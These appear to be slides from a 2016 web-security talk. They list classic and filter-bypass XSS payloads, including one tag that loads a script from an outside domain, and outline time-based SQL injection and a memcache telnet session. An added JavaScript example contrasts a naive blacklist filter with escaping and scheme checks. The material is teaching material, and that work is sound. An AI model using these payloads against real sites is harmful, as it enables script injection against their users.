Web Application Security (Akademik Bilişim 2016)
- 3. #! cat index
• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
- 13. #! cat classic-xss-payloads
• <script>alert(1)</script>
• <img src="javascript:alert('XSS');">
• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
• <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT>
• <video src=1 onerror=alert(1)>
• <audio src=1 onerror=alert(1)>
• <img src=x onerror=alert(1)">
- 14. #! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>
• alert(String.fromCharCode(88,83,83))
• <IMG SRC=ja…………….')>
• <IMG SRC='vbscript:msgbox("XSS")'>
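An added example, not from the original slides: it shows why a filter that deletes blocked words lets the bypass payload above through, and what context-aware output handling does instead. `naiveStrip`, `BLOCKED`, `escapeHtml`, `isAllowedUrl` and the base URL are assumed names and values chosen for illustration.

```javascript
// Added example, not code from the slides. naiveStrip is a hypothetical
// blacklist filter of the kind the bypass payloads are built to defeat.
const BLOCKED = ["script", "alert"]; // assumed blacklist

// Weak: deletes each blocked word in one pass and never rescans the result.
function naiveStrip(input) {
  return BLOCKED.reduce(
    (out, word) => out.replace(new RegExp(word, "gi"), ""),
    String(input)
  );
}

// Hardened, HTML body / quoted-attribute context: encode instead of delete.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Hardened, URL attributes (src, href): encoding does not remove a
// javascript: or vbscript: scheme, so allow only known schemes.
// The base URL is a placeholder used to resolve relative paths.
function isAllowedUrl(value, base = "https://app.example/") {
  try {
    return ["http:", "https:"].includes(new URL(value, base).protocol);
  } catch {
    return false;
  }
}

// Payloads copied from the slides above.
const bypass = "<scrscriptipt>alalertert(1)</scrscriptipt>";
const schemes = ["javascript:alert('XSS');", 'vbscript:msgbox("XSS")'];

function demo() {
  return {
    stripped: naiveStrip(bypass),
    encoded: escapeHtml(bypass),
    urlChecks: schemes.map((u) => isAllowedUrl(u)),
    relativeOk: isAllowedUrl("/img/logo.png"),
  };
}

console.log(demo());
```

The stripped value is identical to the first classic payload, while the encoded value contains no markup characters at all.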
- 29. #! cat time-based-sql-injection
• What if a query that produces no output is running in the background?
– Count Query
– Update Query
– Insert Query
– Delete Query
– Relationship Query
- 38. #! telnet 127.0.0.1 11211
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END